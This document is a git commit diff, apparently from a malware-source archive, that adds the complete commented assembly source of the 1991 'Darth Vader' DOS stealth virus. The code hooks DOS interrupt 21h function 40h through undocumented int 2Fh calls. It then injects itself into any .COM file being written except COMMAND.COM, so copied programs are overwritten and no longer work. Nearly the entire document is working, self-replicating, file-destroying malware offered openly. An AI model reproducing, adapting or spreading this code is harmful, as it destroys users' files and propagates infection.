re-organize

push
2026-06-16 15:59:24 +00:00 · 2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,164 @@
+;*******************************************************************************
+;*									       *
+;*		   D A R T H   V A D E R   -  stealth virus		       *
+;*									       *
+;*	 (C) - Copyright 1991 by Waleri Todorov, CICTT			       *
+;*	 All Rights Reserved						       *
+;*									       *
+;*	 Virus infect ANY com file exept COMMAND.COM. He use iternal DOS       *
+;*	 dispatcher for int21 functions, so it cannot be stoped by programs    *
+;*	 like ANTI4US etc... He also cannot be stoped by disk lock utilities   *
+;*	 because the virus use WRITE function (40h) of DOS' int21.             *
+;*	 Always when you copy COM file with DOS' 'copy' command or PCTools     *
+;*	 class programm, you will receive infected (destroyed) copy  of file   *
+;*	 Infected file won't work, but the virus WILL                          *
+;*									       *
+;*						     Waleri Todorov	       *
+;*									       *
+;*******************************************************************************
+		nop			; Dummy NOPs. Required
+		nop
+
+		mov	ah,30h		; Get DOS version
+		int	21h
+		cmp	al,5		; If DOS is NOT 5.X
+		jb	OkDOS		; Continue
+Exit					; else terminate
+		int	20h
+OkDos
+		mov	ax,1203h	; Get DOS segment
+		int	2fh		; Via interrupt 2F (undocumented)
+
+		mov	si,9000h	; Set ES to 9000
+		mov	es,si		; Usualy this area is fill with zeros
+		xor	si,si		; SI=0
+Next
+		inc	si		; Next byte
+		cmp	si,0F00h	; If SI==0xF00
+		ja	Exit		; Then no place found and exit to DOS
+		push	si		; else Save SI in stack
+		xor	di,di		; ES:DI == 9000:0000
+		mov	cx,offset lastbyte-100h ; Will check virus size
+		repe	cmpsb		; Check until equal
+		jcxz	Found		; if CX==0 then place is found
+		pop	si		; else restore SI from stack
+		jmp	short Next	; and go search next byte
+Found
+		pop	di		; Restore saved SI to DI
+		mov	cs:MyPlace,di	; Save new offset in DOS segment
+		mov	[2],di		; at DOSSEG:0002
+		mov	si,100h 	; SI will point beginning in file
+		push	ds		; Save DS
+		push	ds		; Set ES equal to DS
+		pop	es		;
+		push	cs		; Set DS=CS
+		pop	ds		;
+		mov	cx,offset LastByte-100h ; Will move virus size only
+		rep	movsb		; Do move
+		pop	ds		; Restore DS (point to DOSSEG)
+
+		push	si		; From this place will search DOS table
+NextTable
+		pop	si		;
+		inc	si		; Next byte
+		jz	Exit		; If segment end then exit
+		push	si		; Save SI
+		lodsw			; Load AX from DS:SI
+		xchg	ax,bx		; Put AX in BX
+		lodsb			; and load AL from DS:SI
+		cmp	bx,8B2Eh	; Check for special bytes
+		jne	NextTable	; in AL and BX
+		cmp	al,9Fh
+		jne	NextTable	; If not match -> search next byte
+FoundTable
+		lodsw			; Else load table address to AX
+
+		xchg	ax,bx		; Put table address to BX
+		mov	si,[bx+80h]	; Load current offset of 40h function
+		mov	di,offset Handle	; Put its offset to DI
+		mov	cx,5		; Will check 5 bytes only
+		push	cs		; ES:DI point handling of 40 in file
+		pop	es
+		repe	cmpsb		; Check if DS:SI match to ES:DI
+		jcxz	Exit		; If match -> virus is here -> Exit
+		mov	ax,[bx+80h]	; else load offset of function 40
+		mov	[4],ax		; And save it to DOSSEG:0004
+		mov	ax,offset Handle-100h	; Load absolute address of
+		add	ax,cs:MyPlace	; new handler and adjust its location
+		mov	[bx+80h],ax	; Store new address in DOS table
+
+		int	20h		; Now virus is load and active
+
+Handle					; Handle function 40h of int 21
+		push	ax		; Save important registers
+		push	bx
+		push	cx
+		push	ds
+		push	es
+		push	si
+		push	di
+
+		cmp	cx,270d 	; Check if write less than virus size
+		jb	Do		; If so -> write with no infection
+
+		mov	cs:[0C00h],ds	; Save buffer segment in DOSSEG:0C00
+		mov	cs:[0C02h],dx	; Save buffer offset in DOSSEG:0C02
+
+		mov	ax,1220h	; Get number of File Handle table
+		int	2fh		; Via int 2F (undocumented)
+		mov	bl,es:[di]	; Load number to BL
+		mov	ax,1216h	; Get File Handle table address
+		int	2fh		; Via int 2F (undocumented)
+
+		push	di		; Save table offset
+		add	di,20h		; Now offset point to NAME  of file
+
+		push	cs		; DS now will point in virus
+		pop	ds
+
+		mov	si,offset Command-100h	; Address of string COMM
+		add	si,cs:[2]	; Adjust for different offset in DOS
+		mov	cx,4		; Check 4 bytes
+		repe	cmpsb		; Do check until equal
+		pop	di		; Restore address of table
+		jcxz	Do		; If match ->  file is COMMand.XXX
+
+		add	di,28h		; Else DI point to EXTENSION of file
+		mov	si,offset Com-100h	; Address of string COM
+		add	si,cs:[2]	; Adjust for different offset in DOS
+		mov	cx,3		; Check 3 bytes
+		repe	cmpsb		; Do check until equal
+		jne	Do		; If NOT *.COM file -> write normal
+
+		mov	di,cs:[0C02h]	; Else restore data buffer from
+		mov	es,cs:[0C00h]	; DOSSEG:0C00 & DOSSEG:0C02
+		mov	si,cs:[2]	; Get virus start offset
+		mov	cx,offset LastByte-100	; Will move virus only
+		rep	movsb		; Move its code in data to write
+
+; Now virus is placed in data buffer of COPY command or PCTools etc...
+; When they write to COM file they write virus either
+
+Do
+		pop	di		; Restore importatnt registers
+		pop	si
+		pop	es
+		pop	ds
+		pop	cx
+		pop	bx
+		pop	ax
+
+		db	36h,0FFh,16h,4,0       ; CALL SS:[4] (call original 40)
+		ret				; Return to caller (usualy DOS)
+
+Command 	db     'COMM'           ; String for check COMMand.XXX
+Com		db	'COM'           ; String for check *.COM
+
+		db	'Darth Vader'   ; Signature
+
+
+LastByte	nop			; Mark to calculate virus size
+
+MyPlace
+		dw	0		; Temporary variable. Not writed
+